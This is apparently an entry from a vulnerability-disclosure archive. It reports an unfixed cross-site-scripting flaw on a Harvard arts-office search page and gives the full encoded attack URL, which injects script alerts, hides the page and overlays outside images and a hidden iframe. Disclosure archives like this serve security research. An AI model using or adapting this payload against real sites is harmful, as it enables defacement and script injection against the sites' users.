Security researcher Sony, has submitted on 24/07/2011 a cross-site-scripting (XSS) vulnerability affecting ofa.fas.harvard.edu, which at the time of submission ranked 1610 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 25/07/2011. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail. |
| Date submitted: 24/07/2011 |
Date published: 25/07/2011 |
Fixed? Mail us! | Status:  UNFIXED |
| Author: Sony |
Domain: ofa.fas.harvard.edu |
Category: XSS |
Pagerank: 1610 |
|---|
URL: http://ofa.fas.harvard.edu/cal/search.php?q=%22%3E%3C/title%3E%3Cscript%3Ealert%28%22XSS%20by%20Sony
%22%29%3C/script%3E%3Cscript%3Ealert%28%22Insecurity%20Romania%20Present%22%29%3C/script%3E%3Cscript
%3Ealert%28%22Harvard%20Arts%22%29%3C/script%3E%3Cstyle%3Ebody{visibility:hidden;}%20html%20{%20back
ground-image:%20url%28http://www.lenagold.ru/fon/geom/shar/raz/razshar41.gif%29;%20}%3C/style%3E%27%
22%3E%3Cdiv%20style=%22position:%20absolute;left:%20420px;top:%2040px;%E2%80%8B%E2%80%8Bz-index:%201
0;visibility:%20visible;%20color:%20White;%20font-size:%2040px;%22%3E%3Cimg%20src=%22http://i1.giftu
be.ru/prikoly/prikolnyjj_shhenok_c00b867a3e7a4b1bb1fac14ecc4faec0.gif%22%20style=%22height:%20400px;
%20width:%20500px;%22%20alt=%22By%20Sony%22%3E%3Cbr%3Eby%20Sony%3Ciframe%20src%20=http://www.youtube
.com/watch?v=NuxS-9t3tnY%22%20width=%220%22%20height=%220%22%20\%3E%3C/div%3E&gosearch=Go |
|
Click here to view the mirror
|
|
|
| 
